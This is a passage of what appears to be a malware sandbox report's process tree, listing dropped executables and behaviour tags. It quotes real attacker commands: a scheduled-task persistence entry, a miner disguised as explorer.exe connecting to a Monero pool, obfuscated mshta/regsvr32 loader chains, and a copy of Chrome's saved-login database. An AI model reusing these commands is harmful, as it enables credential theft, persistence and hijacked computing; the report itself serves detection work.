                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:2648
                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 2648 -s 1544
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:5844
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:6692
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:5176
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:8992
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:7032
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:4292
                                                                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:6712
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                      PID:8616
                                                                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                          PID:7068
                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        PID:2252
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:68
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                            Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:4360
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon174a6c5f1664f.exe
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:1480
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:2660
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17332e41e6b.exe
                                                                                                                                                                                                                                              Mon17332e41e6b.exe
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:1484
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4197520.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4197520.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:3444
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3482271.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3482271.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:1556
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7933448.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7933448.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:1488
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2453573.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2453573.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                  PID:4560
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                    PID:1484
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5149335.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\5149335.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:1300
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\41575.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\41575.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:4720
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                  Mon1708beae021a5ff.exe
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:4392
                                                                                                                                                                                                                                                  • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5884
                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4392 -s 492
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:1964
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:4200
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                      Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:3136
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon1727c156c4abcec.exe
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:2080
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:4920
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                        Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:4180
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17afe24e0084db3.exe" -u
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:2472
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:2800
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                          Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          PID:4100
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MSOVB.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MSOVB.tmp\Mon17bbf11fdb575d.tmp" /SL5="$80054,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe"
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:1872
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:2120
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-IQ678.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-IQ678.tmp\Mon17bbf11fdb575d.tmp" /SL5="$301A8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                  PID:2972
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-CI0DS.tmp\postback.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-CI0DS.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                    PID:512
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:4204
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:2644
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                              PID:2412
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\control.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Adds policy Run key to start application
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:5528
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          /c del "C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3316
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:8820
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:6732
                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:7248
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\msdt.exe"
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1984
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Mmx4hv\i4g4vtj2.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Mmx4hv\i4g4vtj2.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:772
                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:2852
                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2708
                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2700
                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:2484
                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:1888
                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:1436
                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:1348
                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:1220
                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      PID:1056
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                        PID:5208
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\tvssfjc
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                        PID:8372
                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:356
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe
                                                                                                                                                                                                                                                                                        Mon175e6c8b40064b8c8.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                                                                                                                                                                                                                                                                                6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:1552
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:3532
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:5300
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:5484
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:3716
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:5460
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                              regsvr32.exe /S YLIH.bIN
                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              PID:5664
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                        taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                        PID:4744
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                  Mon17a0d8ec302e.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                  PID:3376
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17bffc2992eb3d.exe
                                                                                                                                                                                                                                                                                                  Mon17bffc2992eb3d.exe /mixone
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:1376
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 660
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                    PID:3680
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 664
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:1272
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 648
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 664
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:3548
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 908
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
